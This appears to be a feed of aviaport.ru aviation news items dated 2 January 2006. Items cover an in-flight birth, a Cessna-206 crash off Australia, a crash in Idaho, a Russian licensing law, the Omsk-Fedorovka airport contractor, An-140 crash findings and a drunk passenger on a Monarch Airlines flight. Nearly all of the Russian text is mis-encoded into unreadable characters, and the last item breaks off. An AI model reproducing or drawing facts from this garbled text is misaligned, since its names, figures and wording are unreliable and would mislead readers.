Austral, «¥ג¥¢ט¥£® ¨§ ”א ­ז¨¨ ­  ®בגא®¢ ¥מ­ל®­, ¦¥­י¨­  א®₪¨«  א¥¡¥­× .  «לח¨×  ­ §¢ «¨ €«ל-” ¥₪.ג® ¯א®¨§®ט«® ¥י¥ ¢ בד¡¡®גד. ®ב«¥ ¢כ«¥ג  ¨§ ‹¨®­  בגמ א₪¥בב  § ¬¥ג¨« , חג® ¦¥­י¨­  ב«¨ט×®¬ ₪®«£® ב¨₪¨ג ¢ גד «¥ג¥. ­  ¯®¬®£«  ¯א¨­ןגל א®₪כ,   ­ ו®₪¨¢ט¨©בן ­  ¡®אגד ¢א ח ¯¥א¥א¥§ « ¯ד¯®¢¨­ד.‘ ¬ ¯®«¥ג ¯א®₪®«¦ «בן ¯ןגל ח ב®¢.® ¯א ¢¨« ¬  ¢¨ ¯¥א¥¢®§®×, ¦¥­י¨­כ ב ¡¥א¥¬¥­­®בגלמ ¡®«¥¥ ב¥¬¨ ¬¥בןז¥¢ × ¯®«¥גד ­¥ ₪®¯דב× מגבן. ‘®גאד₪­¨×¨  ¢¨ ×®¬¯ ­¨¨ דג¢¥א¦₪ מג, חג® ¡¥א¥¬¥­­®בג¨ ד םג®© ¦¥­י¨­כ ­¥ ¡כ«® ¢¨₪­®. - - - - -   ¢®בג®×¥ €¢בגא «¨¨ ­¥¡®«לט®© ב ¬®«¥ג ד¯ « ¢ ¢®₪®¥¬ - http://www.aviaport.ru/news/2006/01/02/99274.html -   ¢®בג®×¥ €¢בגא «¨¨ ד¯ « ¢ ¢®₪ד ­¥¡®«לט®© ®₪­®¬®ג®א­כ© ב ¬®«¥ג, ¯®«¨ז¨ן ¯®₪ג¢¥א₪¨«  £¨¡¥«ל ¯ןג¨ ח¥«®¢¥×.   ¡®אגד ב ¬®«¥ג  Cessna-206 ­ ו®₪¨«¨בל ב¥¬ל ח¥«®¢¥× - Mon, 02 Jan 2006 13:24:00 +0300 -   ¢®בג®×¥ €¢בגא «¨¨ ד¯ « ¢ ¢®₪ד ­¥¡®«לט®© ®₪­®¬®ג®א­כ© ב ¬®«¥ג, ¯®«¨ז¨ן ¯®₪ג¢¥א₪¨«  £¨¡¥«ל ¯ןג¨ ח¥«®¢¥×, ב®®¡י ¥ג  £¥­גבג¢® €בב®ט¨ם©ג¥₪ א¥בב.® ₪ ­­כ¬ ¯®«¨ז¨¨ טג ג  ¢¨­ב«¥­₪, £₪¥ ¨ ¯א®¨§®ט¥« ¨­ז¨₪¥­ג, ­  ¡®אגד ב ¬®«¥ג  Cessna-206 ­ ו®₪¨«¨בל ב¥¬ל ח¥«®¢¥× - ט¥בגל ¯ בב ¦¨א®¢-¯ א טמג¨בג®¢ ¨ ¯¨«®ג. „¢  ח¥«®¢¥×  ¢כ¦¨«¨, ®­¨ £®ב¯¨ג «¨§¨א®¢ ­כ, ב®®¡י ¥ג ¯®«¨ז¨ן. ­¥¥ ב®®¡י «®בל ®¡ ®₪­®¬ ¯®£¨¡ט¥¬.‘ ¬®«¥ג ד¯ « ¢ ¢®₪®¥¬ ­¥₪ «¥×® ®ג £®א®₪  ˆ¯בד¨ח ­  ¢®בג®×¥ טג ג  בא §ד ¦¥ ¯®ב«¥ ¢§«¥ג . א¨ח¨­כ ¯א®¨בט¥₪ט¥£® ¢כןב­ןמגבן. - - - - -  «¨ה®א­¨ן: ₪¢  ח¥«®¢¥×  ¯®£¨¡«¨ ¢ א¥§ד«לג ג¥  ¢¨ × ג בגא®הכ - http://www.aviaport.ru/news/2006/01/02/99273.html - ‚ א¥§ד«לג ג¥ ×אדט¥­¨ן ¢ ‘˜€, טג ג €©₪ ו®, ח בג­®£® א¥ ×ג¨¢­®£® ב ¬®«¥ג  ¯®£¨¡«¨ ₪¢  ח¥«®¢¥× , ­ ו®₪¨¢ט¨ובן ­  ¥£® ¡®אגד - Mon, 02 Jan 2006 13:23:00 +0300 - County ב®®¡י¨« ¦דא­ «¨בג ¬ ® ג®¬, חג® ¢ ¬¨­ד¢טדמ ¯ןג­¨זד ¢ א¥§ד«לג ג¥ ×אדט¥­¨ן ח בג­®£® א¥ ×ג¨¢­®£® ב ¬®«¥ג  ¯®£¨¡«¨ ₪¢  ח¥«®¢¥× , ­ ו®₪¨¢ט¨ובן ­  ¥£® ¡®אגד. ˜¥א¨ה דג®ח­¨«, חג® × ג בגא®ה  ¯א®¨§®ט«  ¢ 15 ר«®¬¥גא ו × מ£ד ®ג ¬¥בג­®£®  םא®¯®אג  ’א ×¨, ¢ 14:00 ¢ ¯ןג­¨זד.‘«ד¦¡כ  םא®¯®אג  ¯®₪ג¢¥א₪¨«¨, חג® ב ¬®«¥ג ח בג­®© ×®¬¯ ­¨¨, ­  ¡®אגד ×®ג®א®£® ­ ו®₪¨«¨בל, ¯® א §­®© ¨­ה®א¬ ז¨¨, ט¥בגל ¨«¨ ¢®ב¥¬ל ח¥«®¢¥×, ­ ¯א ¢«ן«בן ¢  םא®¯®אג ’א ×¨ ¨§ ’¢¨­-”®««§, טג ג €©₪ ו®. ® ­¥¢כןב­¥­­כ¬ ¯®×  ¯א¨ח¨­ ¬, ¬ ט¨­  א¥§×® ¨§¬¥­¨«  ×דאב,   § ג¥¬ ב¢ן§ל ב ­¥© ¯א®¯ «  ®×®­ח ג¥«ל­®. ¯א ¢«¥­­כ¥ ­  ¬¥בג® ¯®ב«¥₪­¥£® א ₪¨®ב¨£­ «  ב¯ ב ג¥«¨ ®¡­ אד¦¨«¨ £®אןי¨¥ ®¡«®¬×¨ ב ¬®«¥ג . ®×  ­¥ג ג®ח­®© ¨­ה®א¬ ז¨¨ ® ג®¬, חג® ¯א®¨§®ט«® ב ®בג «ל­כ¬¨ ח«¥­ ¬¨ םר¯ ¦ , ¨ ¯ בב ¦¨א ¬¨, ­ ו®₪¨¢ט¨¬¨בן ­  ¡®אגד ב ¬®«¥ג . ‚ ­ בג®ןי¥¥ ¢א¥¬ן ¯® ₪ ­­®¬ד ₪¥«ד ¢¥₪¥גבן א בב«¥₪®¢ ­¨¥. - - - - - —¨­¨גל ב ¬®«¥גכ א §א¥ט¨«¨ ¢ב¥¬ ¦¥« מי¨¬ - http://www.aviaport.ru/news/2006/01/02/99272.html - ‘ 1 ן­¢ אן 2006 £®₪  ¢ ®בב¨¨ ¢בגד¯¨« ¢ ב¨«ד § ×®­, ®ג¬¥­ןמי¨© ®¡ן§ ג¥«ל­®¥ «¨ז¥­§¨א®¢ ­¨¥ 50 ¢¨₪®¢ ¯א¥₪¯א¨­¨¬ ג¥«לב×®© ₪¥ןג¥«ל­®בג¨ - Mon, 02 Jan 2006 13:22:00 +0300 - ‘ 1 ן­¢ אן 2006 £®₪  ¢ ®בב¨¨ ¢בגד¯¨« ¢ ב¨«ד § ×®­, ®ג¬¥­ןמי¨© ®¡ן§ ג¥«ל­®¥ «¨ז¥­§¨א®¢ ­¨¥ 50 ¢¨₪®¢ ¯א¥₪¯א¨­¨¬ ג¥«לב×®© ₪¥ןג¥«ל­®בג¨, ב®®¡י ¥ג ˆ€ "®¢®בג¨". ג®ג ¦¥ § ×®­ ₪¥« ¥ג ®¡ן§ ג¥«ל­כ¬ «¨ז¥­§¨א®¢ ­¨¥ ­¥ב×®«לרו ¢¨₪®¢ ₪¥ןג¥«ל­®בג¨, ₪«ן ×®ג®אכו א ­¥¥ ב¯¥ז¨ «ל­כו א §א¥ט¥­¨© ­¥ גא¥¡®¢ «®בל. ‚ ח בג­®בג¨ - ¨£®א­®£® ¡¨§­¥ב .‘®£« ב­® ¢בגד¯¨¢ט¥¬ד ¢ ב¨«ד ₪®×ד¬¥­גד, ג¥¯¥אל ­¥ ­ד¦­® ¯®«דח גל «¨ז¥­§¨מ ¯א¥₪¯א¨­¨¬ ג¥«ן¬, ®× §כ¢ מי¨¬ דב«ד£¨ ¢ בה¥א¥ גדא¨§¬ . ’ ×¦¥ «¨ז¥­§¨ן ­¥ ¯®­ ₪®¡¨גבן ₪«ן ¯¥א¥¢®§×¨ ¯ בב ¦¨א®¢ «¥£×®¢כ¬  ¢ג®גא ­ב¯®אג®¬, ¯א®¨§¢®₪בג¢  ג ¡ ח­כו ¨§₪¥«¨©, ג¥ו­¨ח¥ב×®£® ®¡ב«ד¦¨¢ ­¨ן ¢®§₪דט­כו בד₪®¢, ם×ב¯«ד ג ז¨¨ ­¥הג¥₪®¡כ¢ מי¨ו ¯א®¨§¢®₪בג¢ ¨ גא ­ב¯®אג  ­¥הג¨ ¨ £ § .¥®¡ו®₪¨¬®בגל ¯®«דח¥­¨ן «¨ז¥­§¨© ­  ®₪­¨ ¢¨₪כ ₪¥ןג¥«ל­®בג¨ ®ג¬¥­ן¥גבן ב 1 ן­¢ אן 2006 £®₪ , ­  ₪אד£¨¥ - ב 1 ן­¢ אן 2007 £®₪ ,   ₪«ן ®בג «ל­כו ¢¨₪®¢ ¯א¥₪¯א¨­¨¬ ג¥«לב×®© ₪¥ןג¥«ל­®בג¨ - ג®«ל×® ¯®ב«¥ ¢בגד¯«¥­¨ן ¢ ב¨«ד ב®®ג¢¥גבג¢דמי¨ו ג¥ו­¨ח¥ברו א¥£« ¬¥­ג®¢.’ ×¦¥ § ×®­ ד¯א®י ¥ג ¯®«דח¥­¨ן «¨ז¥­§¨© ¨ דג®ח­ן¥ג ¯®«­®¬®ח¨ן ב®®ג¢¥גבג¢דמי¨ו ה¥₪¥א «ל­כו ®א£ ­®¢ ¢« בג¨. - - - - - ”¥₪®א®¢×¥ ¯®₪¡¥אדג ¯®₪אן₪ח¨×  - http://www.aviaport.ru/news/2006/01/02/99271.html - —¨­®¢­¨×¨ ¯א ¢¨ג¥«לבג¢  ¬ב×®© ®¡« בג¨ ­ §®¢דג £¥­¥א «ל­®£® ¯®₪אן₪ח¨×  בגא®¨ג¥«לבג¢  ­®¢®£®  םא®¯®אג  ¬ב×-”¥₪®א®¢×  - Mon, 02 Jan 2006 13:08:00 +0300 -  × בג «® ¨§¢¥בג­® "", ב¥£®₪­ן ח¨­®¢­¨×¨ ¯א ¢¨ג¥«לבג¢  ¬ב×®© ®¡« בג¨ ­ §®¢דג £¥­¥א «ל­®£® ¯®₪אן₪ח¨×  בגא®¨ג¥«לבג¢  ­®¢®£®  םא®¯®אג  ¬ב×-”¥₪®א®¢× . ®¢כ¥ ¢®§₪דט­כ¥ ¢®א®ג  ¬ב× , ­  § ¢¥אט¥­¨¥ בגא®¨ג¥«לבג¢  ×®ג®אכו ¯®גא¥¡ד¥גבן ¡®«¥¥ 5 ¬«א₪ אד¡., ¡ד₪דג ¢¢¥₪¥­כ ¢ ם×ב¯«ד ג ז¨מ ד¦¥ ¢ 2008 £®₪ד. ‡  ¯®«דח¥­¨¥ £¥­¥א «ל­®£® ¯®₪אן₪ , בג®¨¬®בגל ×®ג®א®£® ג®«ל×® ¢ ב«¥₪דמי¥¬ £®₪ד ¯א¥¢כב¨ג 1 ¬«א₪ אד¡., ¯®ב¯®אןג ®¬בר¥ בגא®¨ג¥«ל­כ¥ ×®¬¯ ­¨¨ "‘” "®«¥ג ¨ " ¨ " "®בג®¢¨×",  ג ×¦¥ גמ¬¥­ב× ן ‡€ "€םא®₪א®¬₪®אבגא®©".ƒ¥­¥א «ל­®£® ¯®₪אן₪ח¨×  בגא®¨ג¥«לבג¢   םא®¯®אג  ¬ב×-”¥₪®א®¢×  ב¯¥ז¨ «ל­ ן ×®­×דאב­ ן ×®¬¨בב¨ן ¯א ¢¨ג¥«לבג¢  א¨¨אגכטלן ®¯א¥₪¥«ן«  ¢ח¥א  ₪® ¯®§₪­¥£® ¢¥ח¥א . "‚ ג¥­₪¥א¥ ¯א¨­¨¬ מג דח בג¨¥ ®¬בר© ה¨«¨ « גמ¬¥­ב×®£® ‡€ "€םא®₪א®¬₪®אבגא®©",   ג ×¦¥ ¬¥בג­כ¥ בגא®¨ג¥«ל­כ¥ ×®¬¯ ­¨¨ ‘” "®«¥ג ¨ ", ¨ "®בג®¢¨×", - א בב× § « ­ ח «ל­¨× ד¯א ¢«¥­¨ן ¬¨­¨בג¥אבג¢  ¯א®¬כט«¥­­®© ¯®«¨ג¨×¨, גא ­ב¯®אג  ¨ ב¢ן§¨ ¯א ¢¨ג¥«לבג¢  ¬ב×®© ®¡« בג¨ €«¥×ב ­₪א דט× א¥¢. ® ¥£® ב«®¢ ¬, ¯א¥ג¥­₪¥­גכ ­  ¯®«דח¥­¨¥ £¥­¥א «ל­®£® ¯®₪אן₪  ₪®«¦­כ ¡כ«¨ ₪®× § גל, חג® ®¡« ₪ מג ¢ב¥¬¨ ­¥®¡ו®₪¨¬כ¬¨ × ₪א®¢כ¬¨ ¨ ג¥ו­¨ח¥בר¬¨ ¢®§¬®¦­®בגן¬¨ ₪«ן ¢¥₪¥­¨ן בג®«ל ¬ בטג ¡­®© בגא®©×¨. ¯®¬­¨¬, ®¡  ×ג¨¢­®¬ דח בג¨¨ ®¡« בג­כו ¢« בג¥© ¢ בגא®¨ג¥«לבג¢¥ ­®¢®£®  םא®¯®אג  £ד¡¥א­ ג®א ‹¥®­¨₪ ®«¥¦ ¥¢ § ן¢¨« 8 ₪¥× ¡אן ג¥×די¥£® £®₪  ­  § ב¥₪ ­¨¨  או¨ג¥×גדא­®-£א ₪®בגא®¨ג¥«ל­®£® ב®¢¥ג  א¥£¨®­ . "7 ­®ן¡אן 2008 £®₪  ¬כ ¢§«¥ג¨¬ ב  םא®¯®אג  ”¥₪®א®¢× . ד¦­® בג ¢¨גל ¯¥א¥₪ ב®¡®© ב¥אל¥§­כ¥ § ₪ ח¨", - ¯®®¡¥י « ג®£₪  £ד¡¥א­ ג®א.  בגא®¨ג¥«לבג¢® ­®¢®£®  םא®¯®אג  × §­  א¨¨אגכטלן ¢ ¡ד₪די¥¬ £®₪ד ¯®גא ג¨ג 1 ¬«א₪ אד¡.  × ב®®¡י¨« ¨. ®. ¬¨­¨בגא  ה¨­ ­ב®¢ ¬ב×®© ®¡« בג¨ ¨ו ¨« †₪ ­®¢, א בו®₪כ ­  ¢®§¢¥₪¥­¨¥  םא®¯®אג  ¯®×  ­¥ § «®¦¥­כ ®ג₪¥«ל­®© בגא®×®© ¢ ¡מ₪¦¥ג¥ א¨¨אגכטלן ­  2006 £®₪. "ג  בג גלן ¡ד₪¥ג ¯א®ה¨­ ­ב¨א®¢ ­  §  בח¥ג ₪®¯®«­¨ג¥«ל­כו ₪®ו®₪®¢ × §­כ ¨«¨ ¯¥א¥א ב¯א¥₪¥«¥­¨ן ח בג¨ א בו®₪®¢ ­  ­¥¯א¨®א¨ג¥ג­כ¥ § ₪ ח¨", - ב®®¡י¨« £®ב¯®₪¨­ †₪ ­®¢.‚®§¢¥₪¥­¨¥ ¢ ¬ב×¥  םא®¯®אג  ”¥₪®א®¢×  ­ ח «®בל ¢ 1982 £®₪ד. ‘₪ ח  ®¡ך¥×ג  ¢ בגא®© ¡כ«  § ¯« ­¨א®¢ ­  ­  1993 £®₪. ₪­ ×® ה¨­ ­ב¨א®¢ ­¨¥ בגא®¨ג¥«לבג¢  ¡כ«® ¯א¥×א י¥­® ¢ ­ ח «¥ 90-ו £®₪®¢, × םג®¬ד ¢א¥¬¥­¨ ¢§«¥ג­®-¯®ב ₪®ח­ ן ¯®«®ב  ¨ ®¡ך¥×גכ ¨­הא בגאד×גדאכ ¡כ«¨ £®ג®¢כ ­  65%. ‚ ­ בג®ןי¨© ¬®¬¥­ג ­¥₪®בגא®¥­­כ©  םא®¯®אג א ב¯®« £ ¥ג ¢§«¥ג­®© ¯®«®ב®© ₪«¨­®© 2930 ¬ ¨ ×®ג¥«ל­®© ¬®י­®בגלמ 54 ‚ג.  םא®¯®אגד ¯®₪¢¥₪¥­ ¢®₪®¢®₪, ם«¥×גא®ב¥ג¨, £ §®¯א®¢®₪ ¨ ¦¥«¥§­®₪®א®¦­ ן ¬ £¨בגא «ל.”¨­ ­ב¨א®¢ ­¨¥ בגא®¨ג¥«לבג¢  ­ ח­¥גבן ¯®ב«¥ ג®£®, × × ח¨­®¢­¨×¨ א¥ט ג ¢®¯א®ב ב ¯¥א¥¢®₪®¬ ”¥₪®א®¢×¨ ¢ א¥£¨®­ «ל­דמ ב®¡בג¢¥­­®בגל. "‘¥©ח ב ¬כ ד¦¥ ®¡א ג¨«¨בל ¢ א®בב¨©ב×®¥  £¥­גבג¢® "®ב¨¬די¥בג¢®". ˆ ¯®×  םג  ¯א®ז¥₪דא  (¯¥א¥₪ ח  ¢ ב®¡בג¢¥­­®בגל א¥£¨®­ . - "") ­¥ ¡ד₪¥ג ¯א®¢¥₪¥­ , × בגא®¨ג¥«לבג¢ד  םא®¯®אג  ¬כ ¯א¨בגד¯ גל ­¥ ¡ד₪¥¬. כ ­¥ ב®¬­¥¢ ¥¬בן, חג® ¢ב¥ ­¥®¡ו®₪¨¬כ¥ ¡ד¬ £¨ ¡ד₪דג ®ה®א¬«¥­כ ¢ ¯¥א¢®¬ ×¢ אג «¥ ב«¥₪דמי¥£® £®₪ ", - ¯®₪¥«¨«בן ¯א®£­®§®¬ €«¥×ב ­₪א דט× א¥¢. ® ¥£® ₪ ­­כ¬, ב®¢®×ד¯­כ¥ § גא גכ ¯® § ¢¥אט¥­¨מ בגא®¨ג¥«לבג¢  ­®¢®£® ®¬ב×®£®  םא®¯®אג  ב®בג ¢ןג ¡®«¥¥ 5 ¬«א₪ אד¡. ® ב«®¢ ¬ ¨. ®. £¥­¥א «ל­®£® ₪¨א¥×ג®א  € "¬ב×-”¥₪®א®¢× " ‚ «¥א¨ן ®¯®¢ , ₪® 65% ®ג ®¡י¥£® ®¡ך¥¬  ה¨­ ­ב¨א®¢ ­¨ן ¢ ¡ד₪די¥¬ £®₪ד ¡ד₪¥ג ­ ¯א ¢«¥­® ­  א¥×®­בגאד×ז¨מ ¢§«¥ג­®-¯®ב ₪®ח­®© ¯®«®בכ. "‘¥©ח ב ­ד¦­® ®¡¥ב¯¥ח¨גל ¡¥ב¯¥א¥¡®©­®¥ ב­ ¡¦¥­¨¥ בגא®¨ג¥«ל­®© ¯«®י ₪ר ¢®₪®© ¨ ם«¥×גא¨ח¥בג¢®¬, ¯®₪£®ג®¢¨גל ¬¥בג  ₪«ן א §¬¥י¥­¨ן «מ₪¥© ¨ ג¥ו­¨×¨, חג®¡כ ¢  ¯א¥«¥ ¬®¦­® ¡כ«® ¯א¨בגד¯¨גל ×  ×ג¨¢­®¬ד בגא®¨ג¥«לבג¢ד", - ב®®¡י¨« £®ב¯®₪¨­ ®¯®¢.¦¨₪ ¥גבן, חג® א¥§ד«לג גכ ×®­×דאב  ¯® ®¯א¥₪¥«¥­¨מ £¥­¥א «ל­®£® ¯®₪אן₪ח¨×  בגא®¨ג¥«לבג¢   םא®¯®אג  ¬ב×-”¥₪®א®¢×  ח¨­®¢­¨×¨ ®¡­ א®₪דמג ב¥£®₪­ן. - - - - - א®¨§¢®₪¨ג¥«¨ €­-140 ב®£« ב­כ ב ¢כ¢®₪ ¬¨ ×®¬¨בב¨¨ - http://www.aviaport.ru/news/2006/01/02/99270.html - א¥₪בג ¢¨ג¥«¨ •ƒ€ ¯®₪ג¢¥א₪¨«¨, חג® ב®£« ב­כ ב® ¢ב¥¬¨ ¢כ¢®₪ ¬¨, × ×®ג®אכ¬ ¯א¨ט«  ×®¬¨בב¨ן ¯® א בב«¥₪®¢ ­¨מ ¯א¨ח¨­ × ג בגא®הכ ב ¬®«¥ג  €­-140 - Mon, 02 Jan 2006 13:05:00 +0300 - ‚ח¥א  ¯א¥₪בג ¢¨ג¥«¨ • אל×®¢ב×®£® £®בד₪ אבג¢¥­­®£®  ¢¨ ז¨®­­®£® ¯א®¨§¢®₪בג¢¥­­®£® ¯א¥₪¯א¨ןג¨ן (•ƒ€) ¯®₪ג¢¥א₪¨«¨, חג® ב®£« ב­כ ב® ¢ב¥¬¨ ¢כ¢®₪ ¬¨, × ×®ג®אכ¬ ¯א¨ט«  ×®¬¨בב¨ן ¯® א בב«¥₪®¢ ­¨מ ¯א¨ח¨­ × ג בגא®הכ ב ¬®«¥ג  €­-140, ¢ א ¡®ג¥ ×®ג®א®© ¯א¨­¨¬ « דח בג¨¥ •ƒ€. ®ב«¥ ®¡­ א®₪®¢ ­¨ן ¯¥א¢כו א¥§ד«לג ג®¢ א בב«¥₪®¢ ­¨ן ¢ ­¥×®ג®אכו ‘ˆ ¯®ן¢¨« בל ¨­ה®א¬ ז¨ן ® ג®¬, חג® ¯א®¨§¢®₪¨ג¥«¨ א §¡¨¢ט¥£®בן ב ¬®«¥ג  ­¥ א §₪¥«ןמג ¬­¥­¨¥ ×®¬¨בב¨¨. ‚ח¥א  םג  ¨­ה®א¬ ז¨ן ¡כ«  ®¯א®¢¥א£­דג  ₪¥¯ אג ¬¥­ג®¬ ¯® ב¢ן§ן¬ ב ®¡י¥בג¢¥­­®בגלמ •ƒ€.®¬¨בב¨ן, ¢ ב®בג ¢ ×®ג®א®© ¢®ט«¨ ¯א¥₪בג ¢¨ג¥«¨ €’ ¨¬. €­ג®­®¢  (א §א ¡®גח¨× ב ¬®«¥ג ), ‡ ¯®א®¦ב×®£® ¬ ט¨­®בגא®¨ג¥«ל­®£® ×®­בגאד×ג®אב×®£® ¡מא® "א®£א¥בב" (א §א ¡®גח¨× ₪¢¨£ ג¥«ן), •ƒ€ ¨ § ¯®א®¦ב×®© ×®¬¯ ­¨¨ "®ג®א ‘¨ח" (¯א®¨§¢®₪¨ג¥«ל ₪¢¨£ ג¥«¥©), א בט¨הא®¢ ¢ "ח¥א­כ© ןי¨×" ¯א¨ט«  × ¢כ¢®₪ד, חג® ­  ¢כב®ג¥ 2100 ¬ ב ¬®«¥ג ­ ח « ב­¨¦¥­¨¥ ¯® ב¯¨א «¨, ב®¢¥אט¨¢ ח¥גכא¥ ¢¨ג× . —¥א¥§ ­¥ב×®«ל×® ב¥×ד­₪ ב¢ן§ל ב םר¯ ¦¥¬ ¯א®¯ « , ¯®ב«¥ ח¥£® ב ¬®«¥ג ¨בח¥§ ב א ₪ א®¢. ¥א¢כ¥ א¥§ד«לג גכ א בב«¥₪®¢ ­¨ן ¯®× § «¨, חג® ₪¢¨£ ג¥«¨ ב ¬®«¥ג , ב¨בג¥¬כ ד¯א ¢«¥­¨ן ¨ ם­¥א£®ב­ ¡¦¥­¨ן ¡כ«¨ ¨ב¯א ¢­כ. א¨ח¨­®© × ג בגא®הכ ¬®£«  בג גל ­¥¨ב¯א ¢­®בגל  ¢¨ £®א¨§®­ג®¢ - ¯א¨¡®א®¢, ¯®× §כ¢ מי¨ו ¯®«®¦¥­¨¥ ב ¬®«¥ג  ¢ ¯א®בגא ­בג¢¥. ¯®¬­¨¬, חג® 23 ₪¥× ¡אן ¯®₪  ×ד ¯א®¨§®ט«® ×אדט¥­¨¥ ב ¬®«¥ג  ו אל×®¢ב×®£® ¯א®¨§¢®₪בג¢  €­-140, ¢כ¯®«­ן¢ט¥£® א¥©ב  ×ד - €×ג ד. ‚ א¥§ד«לג ג¥ × ג בגא®הכ ¯®£¨¡«¨ 23 ח¥«®¢¥× . א ¢¨ג¥«לבג¢® €§¥א¡ ©₪¦ ­  ¯א¨®בג ­®¢¨«® ם×ב¯«ד ג ז¨מ ב ¬®«¥ג®¢ €­-140 ₪® ®×®­ח ­¨ן א בב«¥₪®¢ ­¨ן ¯א¨ח¨­ × ג בגא®הכ. - - - - - ®¡¨­§®­ "¯®­¥¢®«¥" - http://www.aviaport.ru/news/2006/01/02/99268.html - †¨ג¥«ל ‚¥«¨×®¡א¨ג ­¨¨, ¦¥« ¢ט¨© ¢בגא¥ג¨גל ®¢כ© £®₪ ¢ ×®¬¯ ­¨¨ ₪אד§¥© ­  ®בגא®¢¥ ’¥­¥א¥ה¥, ¯®¯ « ¢ § גאד₪­¨ג¥«ל­דמ ב¨גד ז¨מ, בג ¢ "®¡¨­§®­®¬ ¯®­¥¢®«¥" - Mon, 02 Jan 2006 13:03:00 +0300 - †¨ג¥«ל ‚¥«¨×®¡א¨ג ­¨¨, בגא בג­® ¦¥« ¢ט¨© ¢בגא¥ג¨גל ®¢כ© £®₪ ¢ ×®¬¯ ­¨¨ ₪אד§¥© ­  ¨ב¯ ­ב×®¬ ®בגא®¢¥ ’¥­¥א¥ה¥, ¯®¯ « ¢ ¢¥בל¬  § גאד₪­¨ג¥«ל­דמ ב¨גד ז¨מ, בג ¢ ¯¥א¥₪ ¯א §₪­¨×®¬ "®¡¨­§®­®¬ ¯®­¥¢®«¥".®¬ ­₪¨א  ¢¨ « ©­¥א , ב«¥₪®¢ ¢ט¥£® א¥©ב®¬ ZB-558 ­  ’¥­¥א¨ה¥ ¨§  ­ח¥בג¥א , ¯א¨­ן« א¥ט¥­¨¥ ב®¢¥אט¨גל ­¥§ ¯« ­¨א®¢ ­­דמ ¯®ב ₪×ד, חג®¡כ ¢כב ₪¨גל ¯¥א¥¯¨¢ט¥£® ¢® ¢א¥¬ן א¥©ב  ¯ בב ¦¨א . ’®ג ­ ח « ב×¢¥א­®ב«®¢¨גל ¢  ₪א¥ב ¯ בב ¦¨א®¢ ¨ ×®¬ ­₪כ, ¯א®¨£­®א¨א®¢ ¢ גא¥¡®¢ ­¨¥ דב¯®×®¨גלבן. ‚ םג®ג ¬®¬¥­ג « ©­¥א, ­  ¡®אגד ×®ג®א®£® ­ ו®₪¨«¨בל 210 ח¥«®¢¥×, «¥ג¥« ­  ¢כב®ג¥ ®×®«® 10 ר«®¬¥גא®¢.ˆ ו®גן ₪® ’¥­¥א¨ה¥ ®בג ¢ «®בל ¢ב¥£® 45 ¬¨­דג ¯®«¥ג , םר¯ ¦ ¯א¨ט¥« × ¢כ¢®₪ד, חג® ¯א¨בדגבג¢¨¥ ¯לן­®£® גדא¨בג  ד£א®¦ ¥ג ¡¥§®¯ ב­®בג¨ ¯®«¥ג . ˆ א¥ט¨« ב®¢¥אט¨גל ­¥§ ¯« ­¨א®¢ ­­דמ ¯®ב ₪×ד, חג®¡כ ¢כב ₪¨גל ¡א¨ג ­ז  ­  ×א®ט¥ח­®¬ ®בגא®¢×¥ ®אג®-‘ ­ג®, א ב¯®«®¦¥­­®¬ ­¥₪ «¥×® ®ג ב¥¢¥א­®£® ¯®¡¥א¥¦לן €הא¨×¨.‘ד₪ן ¯® ¢ב¥¬ד, ®¢כ© £®₪ ¥¬ד ¯א¨₪¥גבן ¢בגא¥ג¨גל ­  םג®¬ ®בגא®¢×¥ ב ­ ב¥«¥­¨¥¬ ¢ ח¥גכא¥ גכבןח¨ ח¥«®¢¥×. ‡₪¥בל ­¥ג × §¨­® ¨ ­®ח­כו ׫ד¡®¢. € ¥₪¨­בג¢¥­­כ¬ א §¢«¥ח¥­¨¥¬ ¬¥בג­כו ¦¨ג¥«¥© ®בג מגבן ג®«ל×® ¯א®£ד«×¨ ¯® ¯¥בח ­כ¬ ₪מ­ ¬. א ¢₪ , ¨¬¥­­® ­  םג®¬ ®בגא®¢¥, ב®£« ב­® ¯א¥₪ ­¨ן¬, ­¥ב×®«ל×® בג®«¥ג¨© ­ § ₪ ¡ד₪די¨© ¯¥א¢®®ג×אכ¢ ג¥«ל €¬¥א¨×¨ •א¨בג®ה®א ®«ד¬¡ ¯®§­ ×®¬¨«בן ב® ב¢®¥© ¡ד₪די¥© ¦¥­®©. ’ × ®אג®-‘ ­ג® ¢®ט¥« ¢ ¨בג®א¨מ.‚¯א®ח¥¬, ד ¡א¨ג ­ב×®£® "®¡¨­§®­ " ¥י¥ ®בג ¥גבן ט ­ב ₪®¡א גלבן × ¯א §₪­¨×ד ­  ’¥­¥א¨ה¥. א ¢₪ , ג¥¯¥אל ¥¬ד ¯א¨₪¥גבן ¢כ¡¨א גל: «¨¡® ®ג¯א ¢¨גלבן ­  ®בגא®¢  ₪¥©א  ­  ¯ א®¬¥ ¨ ד¦¥ ®גגד₪  ¯¥א¥ב¥בגל ­  ₪אד£®© ב ¬®«¥ג ₪® ¬¥בג  ­ §­ ח¥­¨ן, «¨¡® ¢¥א­דגלבן ₪®¬®© ¢ €­£«¨מ.€¢¨ ×®¬¯ ­¨ן Monarch Airlines ¯®×  ¥י¥ ­¥ א¥ט¨« , ¯®₪ ¢ גל «¨ ¢ בד₪ ­  ­¥§ ₪ ח«¨¢®£® ¡א¨ג ­ז  ¢ ב¢ן§¨ ב ­¥§ ¯« ­¨א®¢ ­­כ¬ ¨§¬¥­¥­¨¥¬ ¬ אטאדג , ×®ג®א®¥, ¯® ב«®¢ ¬ ¯א¥₪בג ¢¨ג¥«ן ×®¬¯ ­¨¨, ®¡®ט«®בל ¥© ¢ ­¥ב×®«ל×® גכבןח הד­ג®¢ בג¥א«¨­£®¢.בג ג¨¥ב¬®גאן ­  ח¥גכא¥וח ב®¢דמ § ₪¥א¦×ד, ¯ בב ¦¨אכ ¯®«­®בגלמ ¯®₪₪¥א¦ «¨ א¥ט¥­¨¥ םר¯ ¦  ¢כב ₪¨גל ב×¢¥א­®ב«®¢ .  × ב®®¡י¨«  „¦® ®¡¥אגב®­, ¯א¥₪בג ¢¨ג¥«ל  ¢¨ ×®¬¯ ­¨¨ Monarch Airlines, ­ אדט¨ג¥«מ ב¯®×®©בג¢¨ן ¯א¥₪«®¦¨«¨ ¯®₪¯¨ב גל ¯א®ג®×®«, £₪¥ ¡כ« § ה¨×ב¨א®¢ ­ ה ×ג ¥£® ­¥¯®₪®¡ מי¥£® ¯®¢¥₪¥­¨ן, ®₪­ ×® ג®ג ®ג× § «בן םג® ב₪¥« גל. - - - - - ‚®§₪דט­®¥ ¯א®בגא ­בג¢® • ¡ א®¢ב×  ¯דבגד¥ג - http://www.aviaport.ru/news/2006/01/02/99269.html - ¥א¢®£® ן­¢ אן ¨§ • 